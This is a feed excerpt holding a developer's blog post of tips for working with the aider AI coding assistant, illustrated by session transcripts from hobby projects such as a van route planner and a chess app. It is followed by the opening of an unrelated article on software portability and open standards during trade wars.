    </body>
    </html>
    >>>>>>> REPLACE
    ```
    
    styles.css
    ```css
    <<<<<<< SEARCH
    =======
    .container {
        max-width: 800px;
        margin: 0 auto;
        padding: 20px;
    }
    
    section {
        margin-bottom: 20px;
    }
    
    .van-item, .location-item {
        margin: 10px 0;
        padding: 10px;
        border: 1px solid #ccc;
        border-radius: 4px;
    }
    
    button {
        margin: 5px;
        padding: 5px 10px;
    }
    
    input, select {
        margin: 0 5px;
        padding: 3px;
    }
    
    #calculate {
        display: block;
        margin-top: 20px;
        padding: 10px 20px;
    }
    >>>>>>> REPLACE
    ```
    
    app.js
    ```javascript
    <<<<<<< SEARCH
    =======
    let vans = [];
    let locations = [];
    
    function addVan() {
        const van = {
            id: Date.now().toString(),
            seatCount: 6
        };
        vans.push(van);
        renderVans();
        updateCalculateButton();
    }
    
    function addLocation() {
        const location = {
            id: Date.now().toString(),
            name: '',
            passengerCount: 1
        };
        locations.push(location);
        renderLocations();
        updateCalculateButton();
    }
    
    function renderVans() {
        const vanList = document.getElementById('van-list');
        vanList.innerHTML = vans.map(van => `
            <div class="van-item">
                <label>Seats:
                    <select onchange="updateVanSeats('${van.id}', this.value)">
                        <option value="6" ${van.seatCount === 6 ? 'selected' : ''}>6</option>
                        <option value="7" ${van.seatCount === 7 ? 'selected' : ''}>7</option>
                    </select>
                </label>
                <button onclick="deleteVan('${van.id}')">Delete</button>
            </div>
        `).join('');
    }
    
    function renderLocations() {
        const locationList = document.getElementById('location-list');
        locationList.innerHTML = locations.map(location => `
            <div class="location-item">
                <input type="text" 
                       placeholder="Location name" 
                       value="${location.name}"
                       onchange="updateLocationName('${location.id}', this.value)">
                <input type="number" 
                       min="1" 
                       max="5" 
                       value="${location.passengerCount}"
                       onchange="updatePassengerCount('${location.id}', this.value)">
                <button onclick="deleteLocation('${location.id}')">Delete</button>
            </div>
        `).join('');
    }
    
    function updateVanSeats(id, seats) {
        const van = vans.find(v => v.id === id);
        if (van) van.seatCount = parseInt(seats);
    }
    
    function updateLocationName(id, name) {
        const location = locations.find(l => l.id === id);
        if (location) location.name = name;
    }
    
    function updatePassengerCount(id, count) {
        const location = locations.find(l => l.id === id);
        if (location) location.passengerCount = parseInt(count);
    }
    
    function deleteVan(id) {
        vans = vans.filter(v => v.id !== id);
        renderVans();
        updateCalculateButton();
    }
    
    function deleteLocation(id) {
        locations = locations.filter(l => l.id !== id);
        renderLocations();
        updateCalculateButton();
    }
    
    function updateCalculateButton() {
        const button = document.getElementById('calculate');
        button.disabled = vans.length === 0 || locations.length === 0;
    }
    
    function calculateRoutes() {
        // This will be implemented next
        console.log('Calculating routes for:', {vans, locations});
    }
    >>>>>>> REPLACE
    ```
    
    > Tokens: 2.7k sent, 993 received. Cost: $0.02 message, $0.06 session.  
    > index.html  
    > Create new file? (Y)es/(N)o [Yes]: y  
    > styles.css  
    > Create new file? (Y)es/(N)o [Yes]: y  
    > app.js  
    > Create new file? (Y)es/(N)o [Yes]: y  
    > Applied edit to app.js  
    > Applied edit to index.html  
    > Applied edit to styles.css  
    > Commit 85ddd01 feat: Create initial HTML/CSS/JS structure for van route planner UI  
    
    /ask how do i run this project with watch mode enabled?
    
        
        Looking at the file structure, this appears to be a full-stack JavaScript/Node.js project with a React client. To run it in watch mode, you'll likely need to:
        
         1 Start the client (React app) in watch mode:
        
         cd client
         npm start
        
         2 Start the server in watch mode (in a separate terminal):
        
         # From the root directory
         npm run dev
        
        However, to give you the exact commands, I'd need to see the contents of:
        
         • root package.json
         • client/package.json
        
        Could you please add them to the chat?
        
        Tokens: 2.4k sent, 130 received. Cost: $0.0091 message, $0.0091 session.
        
        client/package.json
        Add file to the chat? (Y)es/(N)o/(A)ll/(S)kip all/(D)on't ask again [Yes]: Yes
        
        package.json
        Add file to the chat? (Y)es/(N)o/(A)ll/(S)kip all/(D)on't ask again [Yes]:
        Thanks! Looking at the package.json files you shared, you can run the project in watch mode using:
        
         npm run dev
        
        This command (defined in the root package.json) will use concurrently to run both:
        
         • The server with nodemon (npm run server)
         • The client with React's dev server (npm run client)
        
        This will:
        
         • Start the backend server on port 3001 (since the client's proxy is set to http://localhost:3001)
         • Start the React development server (typically on port 3000)
         • Watch for changes in both client and server code
         • Auto-reload when changes are detected
        
        Make sure to first install dependencies in both directories:
        
         npm install        # in root directory
         cd client
         npm install        # in client directory
        
        Then you can run npm run dev from the root directory to start everything in watch mode.
        
        Tokens: 3.2k sent, 192 received. Cost: $0.01 message, $0.02 session.
        
    
    make the chat box send on the Enter key press
    
        To make the chat box send on the Enter key press, we need to modify the `ChessGame.jsx` file. Here's the change:
        
        client/src/ChessGame.jsx
        ```javascript
        <<<<<<< SEARCH
                    
                      <Input
                        value={currentMessage}
                        onChange={(e) => setCurrentMessage(e.target.value)}
                        placeholder="Type a command (e.g., @PawnE2, move forward)"
                      />
                      <Button onClick={handleSendMessage}>Send</Button>
                    
        =======
                    
                      <Input
                        value={currentMessage}
                        onChange={(e) => setCurrentMessage(e.target.value)}
                        onKeyPress={(e) => {
                          if (e.key === 'Enter') {
                            handleSendMessage();
                          }
                        }}
                        placeholder="Type a command (e.g., @PawnE2, move forward)"
                      />
                      <Button onClick={handleSendMessage}>Send</Button>
                    
        >>>>>>> REPLACE
        ```
        
        This change adds an `onKeyPress` event handler to the `Input` component. When the 'Enter' key is pressed, it will trigger the `handleSendMessage` function, just like clicking the "Send" button does.
        
        Now users can send messages by either clicking the "Send" button or pressing the Enter key while the input field is focused.
        
        > Tokens: 8.6k sent, 273 received. Cost: $0.03 message, $0.34 session.  
        > Applied edit to client/src/ChessGame.jsx  
        > Commit 166acdf feat: add Enter key press to send chat message  
        > You can use /undo to undo and discard each aider commit.  
        
    
    the POSSIBILITIES in location is returning an empty string when using the new command.
    
        Let's debug the location command handling. The issue is likely in the `LocationCommandHandler.handle_command` method where we're generating and displaying possibilities. Let's fix it:
        
        ```python
        # In command_handlers.py
        
        class LocationCommandHandler(StateCommandHandler):
            async def handle_command(self, command: str, state) -> bool:
                if command == 'rewrite':
                    # Add error handling and logging
                    print("Generating location possibilities...")
                    places = await lm.single_prompt(
                        f'What are some romance locations that might occur in a romance novel set in {state.location.general}, {state.location.specific}?', 
                        postprocess=lm.markdown_to_list
                    )
                    
                    if not places:
                        print("Error: No locations generated")
                        return False
                        
                    print('\nPOSSIBILITIES:')
                    print("\n\n".join([f'{idx+1}. {place}' for idx, place in enumerate(places)]))
        
                    subc = input('(pick) > ')
                    if subc == 'rand':
                        state.location.place = random.choice(places)
                    else:
                        try:
                            state.location.place = places[int(subc) - 1]
                        except (ValueError, IndexError):
                            print("Invalid selection")
                            return False
                    state.location.other_places = []
                    return True
        
                elif command == 'new':
                    state.location.general = random.choice(list(locations.keys()))
                    state.location.specific = random.choice(locations[state.location.general])
                    print(f"\nSelected: {state.location.general} - {state.location.specific}")
                    return await self.handle_command('rewrite', state)  # Call rewrite directly instead of recursively calling handle_location_command
                    
                elif command in ('others', 'other'):
                    state.state = "OTHER_PLACES"
                    return True
                    
                return False
        ```
        
        The key changes are:
        1. Added error handling for empty responses
        2. Fixed the 'new' command to properly chain to 'rewrite'
        3. Added more logging/feedback
        4. Made sure we're using the correct state attributes
        
        Let me know if you're still seeing issues with the location possibilities generation.
        
        > Tokens: 19k sent, 439 received. Cost: $0.06 message, $2.40 session.  
        > Edit the files? (Y)es/(N)o [Yes]: y  
        
        Here's the proper SEARCH/REPLACE block for the changes:
        
        command_handlers.py
        ```python
        <<<<<<< SEARCH
            async def handle_command(self, command: str, state) -> bool:
                if command == 'rewrite':
                    places = await lm.single_prompt(f'What are some romance locations that might occur in a romance novel set in {state.location.general}, {state.location.specific}?', postprocess=lm.markdown_to_list)
                    print('POSSIBILITIES:')
                    print("\n\n".join([f'{idx+1}. {place}' for idx, place in enumerate(places)]))
        
                    subc = input('(pick) > ')
                    if subc == 'rand':
                        state.location.place = random.choice(places)
                    else:
                        state.location.place = places[int(subc) - 1]
                    state.location.other_places = []
                    return True
                elif command == 'new':
                    state.location.general = random.choice(list(locations.keys()))
                    state.location.specific = random.choice(locations[state.location.general])
                    print(state.location.general)
                    print(state.location.specific)
                    await self.handle_command('rewrite', state)
                    return True
                elif command in ('others', 'other'):
                    state.state = "OTHER_PLACES"
                    return True
        =======
            async def handle_command(self, command: str, state) -> bool:
                if command == 'rewrite':
                    # Add error handling and logging
                    print("Generating location possibilities...")
                    places = await lm.single_prompt(
                        f'What are some romance locations that might occur in a romance novel set in {state.location.general}, {state.location.specific}?', 
                        postprocess=lm.markdown_to_list
                    )
                    
                    if not places:
                        print("Error: No locations generated")
                        return False
                        
                    print('\nPOSSIBILITIES:')
                    print("\n\n".join([f'{idx+1}. {place}' for idx, place in enumerate(places)]))
        
                    subc = input('(pick) > ')
                    if subc == 'rand':
                        state.location.place = random.choice(places)
                    else:
                        try:
                            state.location.place = places[int(subc) - 1]
                        except (ValueError, IndexError):
                            print("Invalid selection")
                            return False
                    state.location.other_places = []
                    return True
        
                elif command == 'new':
                    state.location.general = random.choice(list(locations.keys()))
                    state.location.specific = random.choice(locations[state.location.general])
                    print(f"\nSelected: {state.location.general} - {state.location.specific}")
                    return await self.handle_command('rewrite', state)
                    
                elif command in ('others', 'other'):
                    state.state = "OTHER_PLACES"
                    return True
        >>>>>>> REPLACE
        ```
        > Tokens: 15k sent, 571 received. Cost: $0.05 message, $2.50 session.  
        > Applied edit to command_handlers.py  
        > Commit 0e432dd refactor: Improve error handling and logging in location command handler  
        > You can use /undo to undo and discard each aider commit.  
        
    

    As a traditional dev I’m used to each commit being a working copy of the repo. But aider makes a commit for every request, which means most of your commits will be broken. That’s ok. Keep iterating, and use /git tag to identify working commits instead. Use semantic versioning to identify how big of a change each version represents and review your changes with /git log

    /git tag
    
        v0.1
        v0.1.1
        v0.2
        v0.2.1
        v0.3
        v0.3.1
        v0.3.2
        v0.3.3
        v0.3.4
        
    
    /git tag v0.3.5
    
    
    /git log —decorate -n 5
    
        commit 5f08ffd9a0e6088ef20dd516c01fedd7129dd908 (HEAD -> main)
        Author: Mitchell Gordon (aider) <mitchell.gordon95@gmail.com>
        Date:   Tue Jan 21 17:50:26 2025 -0500
        
            refactor: Remove duplicate routes declaration and improve debug logging
        
        commit c79ff0c7e5fa9fc21b1bcc8e5029ae86d255e50f
        Author: Mitchell Gordon (aider) <mitchell.gordon95@gmail.com>
        Date:   Tue Jan 21 17:49:50 2025 -0500
        
            refactor: Enhance route calculation with state reset and debug logging
        
        commit d5c0925289ad30ae537c2535ead64bef350d57cf
        Author: Mitchell Gordon (aider) <mitchell.gordon95@gmail.com>
        Date:   Tue Jan 21 17:47:12 2025 -0500
        
            refactor: Reset van assignments and trip status during route initialization
        
        commit 9dd130c685bb4f00494b4fdcec37a3f27c5557b8 (tag: v1.2.0)
        Author: Mitchell Gordon (aider) <mitchell.gordon95@gmail.com>
        Date:   Tue Jan 21 17:38:00 2025 -0500
        
            feat: Enhance depot and location input selection validation
        
        commit 8e05d5285e58785e2a586bfcee1af232e96c198a
        Author: Mitchell Gordon (aider) <mitchell.gordon95@gmail.com>
        Date:   Tue Jan 21 17:34:27 2025 -0500
        
            feat: Add Clear Data button with localStorage reset functionality
        
    

    If there’s an obvious error message, copy and paste the error into aider. If there’s no error message but something is still broken, ask for copious logs to narrow where the problem is. This is 0 cost for you to do now, so you should do it often. Copy the logs into aider, possibly with a note about what issue is indicated.

    Uncaught SyntaxError: Identifier 'routes' has already been declared (at app.js:422:9)
    
        Ah, I see the issue. We have two declarations of `routes` in the `calculateRoutes` function. Let's fix that by removing the second declaration. Here's the fix for `app.js`:
        
        ```javascript
        // Remove this duplicate declaration (around line 422):
        let routes = processedLocations.map(location => ({
            locations: [location],
            totalPassengers: location.passengerCount,
            vanAssigned: false,
            assignedVan: null,
            isSecondTrip: false
        }));
        
        // And keep only the first declaration with the debug logging:
        console.log('\n--- Creating Initial Routes ---');
        let routes = processedLocations.map(location => {
            const route = {
                locations: [location],
                totalPassengers: location.passengerCount,
                vanAssigned: false,
                assignedVan: null,
                isSecondTrip: false
            };
            console.log(`Created initial route:`, route);
            return route;
        });
        ```
        
        This will:
        1. Remove the duplicate declaration of `routes`
        2. Keep the version with the debug logging
        3. Fix the syntax error
        
        The rest of the function can remain the same.
        
        > Tokens: 12k sent, 233 received. Cost: $0.04 message, $0.90 session.  
        > Edit the files? (Y)es/(N)o [Yes]: y  
        
        I'll help create the SEARCH/REPLACE block to fix the duplicate routes declaration in app.js:
        
        app.js
        ```python
        <<<<<<< SEARCH
            console.log('\n--- Initializing Routes ---');
            let routes = processedLocations.map(location => ({
                locations: [location],
                totalPassengers: location.passengerCount,
                vanAssigned: false,
                assignedVan: null,
                isSecondTrip: false
            }));
            console.log('Initial routes:', routes);
        
            console.log('\n--- Merging Routes Based on Savings ---');
        =======
            console.log('\n--- Creating Initial Routes ---');
            let routes = processedLocations.map(location => {
                const route = {
                    locations: [location],
                    totalPassengers: location.passengerCount,
                    vanAssigned: false,
                    assignedVan: null,
                    isSecondTrip: false
                };
                console.log(`Created initial route:`, route);
                return route;
            });
        
            console.log('\n--- Merging Routes Based on Savings ---');
        >>>>>>> REPLACE
        ```
        
        This change:
        1. Removes the duplicate routes declaration
        2. Keeps only one initialization with better debug logging
        3. Maintains the same data structure for routes
        4. Updates the console log message to be more descriptive
        
        > Tokens: 8.0k sent, 253 received. Cost: $0.03 message, $0.93 session.  
        > Applied edit to app.js  
        > Commit 5f08ffd refactor: Remove duplicate routes declaration and improve debug logging  
        > You can use /undo to undo and discard each aider commit.  
        
    
    i'm not seeing any of the generated characters still once we regen. can we add some logging to debug this?
    
        
        Yes, let's add debug logging in key places to trace the flow and see what's happening with the character generation and parsing. Here are the changes needed:
        
        In `characters.py`, modify the `handle_character_command` function:
        
        ```python
        async def handle_character_command(command, app_state):
            if command in ('b', 'back'):
                app_state.state = "MAIN_MENU"
                return True
            else:
                messages = [
                    {"role": "user", "content": characters_prompt.format(
                        location=app_state.location)}
                ]
                logging.info("Generating characters with location: %s", app_state.location)
                result = await handle_pick_command(command, messages, app_state.characters.characters, app_state.characters.characters_choices)
                logging.info("After handle_pick_command, characters are: %s", app_state.characters.characters)
                logging.info("After handle_pick_command, choices are: %s", app_state.characters.characters_choices)
                return result
        ```
        
        And in `lm.py`, add logging to `markdown_to_list`:
        
        ```python
        def markdown_to_list(markdown_text):
            logging.info("Converting markdown to list. Input text:\n%s", markdown_text)
            
            # Split the text into lines
            lines = markdown_text.split('\n')
            
            # Initialize an empty list to store the list items
            list_items = []
            current_item = ''
        
            # Regular expression to match various list markers
            list_marker_pattern = r'^(?:\d+\.|[-•*]|\u2022)\s+'
        
            # Iterate through each line
            for line in lines:
                # Check if the line starts with any list marker
                if re.match(list_marker_pattern, line):
                    logging.info("Found list marker in line: %s", line)
                    # If there's a current item being built, add it to the list
                    if current_item:
                        list_items.append(current_item.strip())
                        current_item = ''
                    # Start a new list item
                    current_item = line
                else:
                    # If the line is a continuation of the current item, append it with a newline
                    if current_item:
                        current_item += '\n' + line
        
            # Add the last item to the list
            if current_item:
                list_items.append(current_item.strip())
        
            # Extract just the text of each list item, excluding the markers
            result = [re.sub(list_marker_pattern, '', item) for item in list_items]
            logging.info("Converted to list items: %s", result)
            return result
        ```
        
        These changes will help us see:
        1. What location is being used for generation
        2. The raw text being processed by markdown_to_list
        3. Which lines are being recognized as list items
        4. The final parsed list
        5. The state of characters and choices after processing
        
        To see the debug output, use the "debug" command in the application to enable debug logging.
        
        > Tokens: 4.3k sent, 610 received. Cost: $0.02 message, $0.07 session.  
        > Edit the files? (Y)es/(N)o [Yes]: y  
        
        I'll help add the debug logging using proper SEARCH/REPLACE blocks. First, we need to add the logging import to characters.py:
        
        characters.py
        ```python
        <<<<<<< SEARCH
        import random
        from dataclasses import dataclass, field
        
        import lm
        =======
        import random
        import logging
        from dataclasses import dataclass, field
        
        import lm
        >>>>>>> REPLACE
        ```
        
        Now modify the handle_character_command function:
        
        characters.py
        ```python
        <<<<<<< SEARCH
        async def handle_character_command(command, app_state):
            if command in ('b', 'back'):
                app_state.state = "MAIN_MENU"
                return True
            else:
                messages = [
                    {"role": "user", "content": characters_prompt.format(
                        location=app_state.location)}
                ]
                return await handle_pick_command(command, messages, app_state.characters.characters, app_state.characters.characters_choices)
        =======
        async def handle_character_command(command, app_state):
            if command in ('b', 'back'):
                app_state.state = "MAIN_MENU"
                return True
            else:
                messages = [
                    {"role": "user", "content": characters_prompt.format(
                        location=app_state.location)}
                ]
                logging.info("Generating characters with location: %s", app_state.location)
                result = await handle_pick_command(command, messages, app_state.characters.characters, app_state.characters.characters_choices)
                logging.info("After handle_pick_command, characters are: %s", app_state.characters.characters)
                logging.info("After handle_pick_command, choices are: %s", app_state.characters.characters_choices)
                return result
        >>>>>>> REPLACE
        ```
        
        And modify the markdown_to_list function:
        
        lm.py
        ```python
        <<<<<<< SEARCH
        def markdown_to_list(markdown_text):
            # Split the text into lines
            lines = markdown_text.split('\n')
        
            # Initialize an empty list to store the list items
            list_items = []
            current_item = ''
        
            # Regular expression to match various list markers
            list_marker_pattern = r'^(?:\d+\.|[-•*]|\u2022)\s+'
        
            # Iterate through each line
            for line in lines:
                # Check if the line starts with any list marker
                if re.match(list_marker_pattern, line):
                    # If there's a current item being built, add it to the list
                    if current_item:
                        list_items.append(current_item.strip())
                        current_item = ''
                    # Start a new list item
                    current_item = line
                else:
                    # If the line is a continuation of the current item, append it with a newline
                    if current_item:
                        current_item += '\n' + line
        
            # Add the last item to the list
            if current_item:
                list_items.append(current_item.strip())
        
            # Extract just the text of each list item, excluding the markers
            return [re.sub(list_marker_pattern, '', item) for item in list_items]
        =======
        def markdown_to_list(markdown_text):
            logging.info("Converting markdown to list. Input text:\n%s", markdown_text)
            
            # Split the text into lines
            lines = markdown_text.split('\n')
            
            # Initialize an empty list to store the list items
            list_items = []
            current_item = ''
        
            # Regular expression to match various list markers
            list_marker_pattern = r'^(?:\d+\.|[-•*]|\u2022)\s+'
        
            # Iterate through each line
            for line in lines:
                # Check if the line starts with any list marker
                if re.match(list_marker_pattern, line):
                    logging.info("Found list marker in line: %s", line)
                    # If there's a current item being built, add it to the list
                    if current_item:
                        list_items.append(current_item.strip())
                        current_item = ''
                    # Start a new list item
                    current_item = line
                else:
                    # If the line is a continuation of the current item, append it with a newline
                    if current_item:
                        current_item += '\n' + line
        
            # Add the last item to the list
            if current_item:
                list_items.append(current_item.strip())
        
            # Extract just the text of each list item, excluding the markers
            result = [re.sub(list_marker_pattern, '', item) for item in list_items]
            logging.info("Converted to list items: %s", result)
            return result
        >>>>>>> REPLACE
        ```
        
        > Tokens: 3.8k sent, 926 received. Cost: $0.03 message, $0.09 session.  
        > Applied edit to lm.py  
        > Applied edit to characters.py  
        > Commit 36c5dd3 feat: Add debug logging for character generation and markdown parsing  
        > You can use /undo to undo and discard each aider commit.  
        
    
    look at this log: [copy of logs]
    
        It appears that the move validation is failing because the chess.js library is case-sensitive for the square notations, but the move received from Claude is in uppercase. Let's modify the server.js file to convert the move to lowercase before validating it. Here's the change we need to make:
        
        server.js
        ```javascript
        <<<<<<< SEARCH
              const chessMove = chess.move({
                from: move.slice(0, 2),
                to: move.slice(2, 4),
                promotion: 'q' // Always promote to queen for simplicity
              });
        =======
              const chessMove = chess.move({
                from: move.slice(0, 2).toLowerCase(),
                to: move.slice(2, 4).toLowerCase(),
                promotion: 'q' // Always promote to queen for simplicity
              });
        >>>>>>> REPLACE
        ```
        
        This change ensures that the 'from' and 'to' squares are always in lowercase, which is what chess.js expects.
        
        Additionally, let's add some more logging to help diagnose any future issues:
        
        server.js
        ```javascript
        <<<<<<< SEARCH
            console.log('Processed result:', result);
        
            console.log('Sending response to client:', result);
            return res.json(result);
          } catch (error) {
            console.error('Error:', error);
            res.status(500).json({ error: 'An error occurred while processing your request.' });
          }
        =======
            console.log('Processed result:', result);
        
            console.log('Sending response to client:', result);
            return res.json(result);
          } catch (error) {
            console.error('Error:', error);
            console.error('Current FEN:', chess.fen());
            console.error('Attempted move:', move);
            res.status(500).json({ error: 'An error occurred while processing your request.' });
          }
        >>>>>>> REPLACE
        ```
        
        These changes will provide more context if an error occurs in the future.
        
        After making these changes, you should restart your server. You can do this with the following command:
        
        ```bash
        npm run start
        ```
        
        This will restart your server with the new changes. After restarting, try the chat command again and check if the move is now being correctly processed.
        
        > Tokens: 6.9k sent, 444 received. Cost: $0.03 message, $0.28 session.  
        > Applied edit to server.js  
        > Commit 813588e fix: Convert move coordinates to lowercase before validating  
        > npm run start  
        > Run shell command? (Y)es/(N)o/(D)on't ask again [Yes]: n  
        > You can use /undo to undo and discard each aider commit.  
        
    

    If you’re lost, ask for diagrams to explore system architecture / components. Visualize them using mermaid. (Upvote my PR.) If you’re using a library / API, copy documentation urls into chat, then ask why the code doesn’t match the examples.

    show me how the API is making calls to Claude to generate chess moves with a mermaid timing diagram (image generated after copying output into http://mermaid.live)
    ok let's have the text boxes for location names actually be google maps auto complete. Here's some sample code from their website. ```[sample code]```
    
        Ok, let's add Google Places Autocomplete to our location inputs. We'll need to:
        
        1. First, update the Google Maps script tag in index.html to include the places library:
        ```html
        <script src="https://maps.googleapis.com/maps/api/js?key=YOUR_API_KEY&libraries=places"></script>
        ```
        
        2. Modify the location input in renderLocations() in app.js:
        ```javascript
        function renderLocations() {
            const locationList = document.getElementById('location-list');
            locationList.innerHTML = locations.map(location => `
                <div class="location-item">
                    <input type="text" 
                           class="location-input"
                           placeholder="Enter address" 
                           value="${location.name}"
                           data-location-id="${location.id}">
                    <input type="number" 
                           min="1" 
                           value="${location.passengerCount}"
                           onchange="updatePassengerCount('${location.id}', this.value)">
                    <button onclick="deleteLocation('${location.id}')">Delete</button>
                </div>
            `).join('');
        
            // Initialize autocomplete for each location input
            document.querySelectorAll('.location-input').forEach(input => {
                const autocomplete = new google.maps.places.Autocomplete(input, {
                    fields: ['formatted_address', 'geometry'],
                    types: ['address']
                });
        
                autocomplete.addListener('place_changed', () => {
                    const place = autocomplete.getPlace();
                    if (place.formatted_address) {
                        const locationId = input.dataset.locationId;
                        updateLocationName(locationId, place.formatted_address);
                    }
                });
            });
        }
        ```
        
        3. Update the updateLocationName function to handle the full address:
        ```javascript
        function updateLocationName(id, name) {
            const location = locations.find(l => l.id === id);
            if (location) {
                location.name = name;
                // Optionally store the formatted address for display
                location.formattedAddress = name;
            }
        }
        ```
        
        4. Add some CSS to style the autocomplete dropdown:
        ```css
        .location-input {
            width: 300px;  /* or whatever width works for your layout */
        }
        
        /* Style the Google Places Autocomplete dropdown */
        .pac-container {
            z-index: 1051;
            width: 300px;
            background-color: #fff;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-shadow: 0 2px 6px rgba(0,0,0,0.3);
        }
        
        .pac-item {
            padding: 8px;
            cursor: pointer;
        }
        
        .pac-item:hover {
            background-color: #f5f5f5;
        }
        ```
        
        This will:
        1. Add autocomplete to each location input
        2. Use Google's Places service to suggest addresses
        3. Store the full formatted address when selected
        4. Style the autocomplete dropdown to match your UI
        
        The autocomplete will:
        - Show suggestions as the user types
        - Allow selection of exact addresses
        - Store the formatted address string
        - Work with the existing Google Maps distance matrix calculations
        
        Would you like me to:
        1. Add location validation
        2. Store latitude/longitude coordinates
        3. Add a map preview
        4. Something else?
        
        > Tokens: 11k sent, 660 received. Cost: $0.04 message, $0.40 session.  
        > Edit the files? (Y)es/(N)o [Yes]: y  
        
        I'll provide the SEARCH/REPLACE blocks for the changes we discussed:
        
        index.html
        ```python
        <<<<<<< SEARCH
            <script src="https://maps.googleapis.com/maps/api/js?key=YOUR_API_KEY"></script>
        =======
            <script src="https://maps.googleapis.com/maps/api/js?key=YOUR_API_KEY&libraries=places"></script>
        >>>>>>> REPLACE
        ```
        
        app.js
        ```python
        <<<<<<< SEARCH
        function renderLocations() {
            const locationList = document.getElementById('location-list');
            locationList.innerHTML = locations.map(location => `
                <div class="location-item">
                    <input type="text" 
                           placeholder="Location name" 
                           value="${location.name}"
                           onchange="updateLocationName('${location.id}', this.value)">
                    <input type="number" 
                           min="1" 
                           value="${location.passengerCount}"
                           onchange="updatePassengerCount('${location.id}', this.value)">
                    <button onclick="deleteLocation('${location.id}')">Delete</button>
                <lt;/div>
            `).join('');
        }
        =======
        function renderLocations() {
            const locationList = document.getElementById('location-list');
            locationList.innerHTML = locations.map(location => `
                <lt;div class="location-item">
                    <lt;input type="text" 
                           class="location-input"
                           placeholder="Enter address" 
                           value="${location.name}"
                           data-location-id="${location.id}">
                    <lt;input type="number" 
                           min="1" 
                           value="${location.passengerCount}"
                           onchange="updatePassengerCount('${location.id}', this.value)">
                    <lt;button onclick="deleteLocation('${location.id}')">Delete</button>
                <lt;/div>
            `).join('');
        
            // Initialize autocomplete for each location input
            document.querySelectorAll('.location-input').forEach(input => {
                const autocomplete = new google.maps.places.Autocomplete(input, {
                    fields: ['formatted_address', 'geometry'],
                    types: ['address']
                });
        
                autocomplete.addListener('place_changed', () => {
                    const place = autocomplete.getPlace();
                    if (place.formatted_address) {
                        const locationId = input.dataset.locationId;
                        updateLocationName(locationId, place.formatted_address);
                    }
                });
            });
        }
        >>>>>>> REPLACE
        ```
        
        app.js
        ```python
        <<<<<<< SEARCH
        function updateLocationName(id, name) {
            const location = locations.find(l => l.id === id);
            if (location) location.name = name;
        }
        =======
        function updateLocationName(id, name) {
            const location = locations.find(l => l.id === id);
            if (location) {
                location.name = name;
                // Optionally store the formatted address for display
                location.formattedAddress = name;
            }
        }
        >>>>>>> REPLACE
        ```
        
        styles.css
        ```python
        <<<<<<< SEARCH
        input, select {
            margin: 0 5px;
            padding: 3px;
        }
        =======
        input, select {
            margin: 0 5px;
            padding: 3px;
        }
        
        .location-input {
            width: 300px;
        }
        
        /* Style the Google Places Autocomplete dropdown */
        .pac-container {
            z-index: 1051;
            width: 300px;
            background-color: #fff;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-shadow: 0 2px 6px rgba(0,0,0,0.3);
        }
        
        .pac-item {
            padding: 8px;
            cursor: pointer;
        }
        
        .pac-item:hover {
            background-color: #f5f5f5;
        }
        >>>>>>> REPLACE
        ```
        
        > Tokens: 4.5k sent, 742 received. Cost: $0.02 message, $0.42 session.  
        > Applied edit to app.js  
        > Applied edit to index.html  
        > Applied edit to styles.css  
        > Commit 7150ee4 feat: Add Google Places Autocomplete to location inputs  
        > You can use /undo to undo and discard each aider commit.
        
    

    For ambiguous changes, ask for clarifying questions. This is good to do at the start of the project. Use interfaces and data structure changes as high leverage points. Changing an interface sucks in traditional dev, but in AI land it’s an easy way to concisely communicate sweeping changes.

    ok we're making a simple app (probably static) that helps van drivers plan who is sitting in which van, based on the number of seats in each van, the locations that each person needs to get to, and the distance between locations. start by asking some clarifying questions
    
        I'll ask some key questions to help design this van planning system:
        
        1. About the vans:
        - Do all vans have the same number of seats or do they vary?
        - Are there any special seating requirements (e.g. wheelchair spaces)?
        - How many vans are typically being planned for at once?
        
        2. About the passengers:
        - Do passengers have preferred pickup/dropoff times?
        - Are there any passengers that need to be grouped together (like families)?
        - Do any passengers have priority over others?
        
        3. About the locations:
        - Are these fixed locations or can they be any address?
        - Will you need to integrate with a mapping service to calculate distances?
        - Are there multiple stops per route or just pickup and final destination?
        
        4. About the usage:
        - Who will be using this tool (dispatchers, drivers, passengers)?
        - Does it need to handle real-time updates?
        - Should it save/export the plans?
        - Does it need to optimize for anything specific (shortest total distance, fewest vans used, etc.)?
        
        5. Technical constraints:
        - Does this need to be a web app, desktop app, or mobile app?
        - Are there any specific technologies you'd like to use?
        - Does it need to integrate with any existing systems?
        
        This will help me suggest an appropriate architecture and approach for the solution.
        
        > Tokens: 187 sent, 269 received. Cost: $0.0046 message, $0.0046 session.  
        > Edit the files? (Y)es/(N)o [Yes]: n  
        
    
    i think we want to change the format of the move received from the backend. …

    Article truncated for RSS feed. Read the full article at http://mitchgordon.me/tools/2025/02/26/aider.html

    ]]>
    http://mitchgordon.me/tools/2025/02/26/aider.html hacker-news-small-sites-43195221 Thu, 27 Feb 2025 15:28:07 GMT
    <![CDATA[Open Standards in a Trade War]]> thread link) | @cdrux
    February 27, 2025 | https://blog.devcycle.com/open-standards-in-a-trade-war/ | archive.org

    Open Standards and tech portability have never been more important—and soon, they could very well be your lifeline. In a world with impending trade wars globally, it may be naive to assume that because you work in software that you won't be impacted by tariffs, taxation and import restrictions. Just this week, tech lawyers warned that software sales could be covered by import tariffs that are looming on the horizon. This isn't just theoretical—it's the next economic bomb waiting to drop.

    Going forward, whether it's an AI model you're betting your company on or a SaaS suite you've grown dependent on, it is going to be critical to be able to rip and replace any software as needed, if (or more accurately, when) the winds of geopolitics shift in the wrong direction.

    The past few years have seen a growing, and now alarming acceleration away from globalism and free trade toward nationalism and protectionism. But what does that mean in practice when the software you rely on suddenly becomes caught in the middle?

    • Protectionism and Trade Disputes: Across the globe, countries are increasingly adopting protectionist policies with teeth to safeguard or shore up domestic industries, secure critical resources or fulfill national security objectives. The clearest example of this is the multi-decade project for the US to become energy independent—and software could easily be next on the "strategic asset" list.
    • Economic Fragmentation: While global trade volume is still technically growing, the rate of growth has plummeted compared to previous decades paired with a drop in foreign investment. This slowdown can be partly attributed to the increase in trade restrictions, and recent political events appear to have accelerated the trend toward economic isolationism.
    • Supply Chain Uncertainty: Growing trade restrictions, and a general increase in political conflicts, are causing major disruptions to global supply chains. This is causing delays, skyrocketing costs, and potential contract losses for businesses caught in the crossfire. Thompson Reuters considers International Politics the #1 cause of increased supply chain risks, and we've only seen the beginning.
    Just a part of the trend, Foreign Investment is declining

    What Does This Mean for Software?

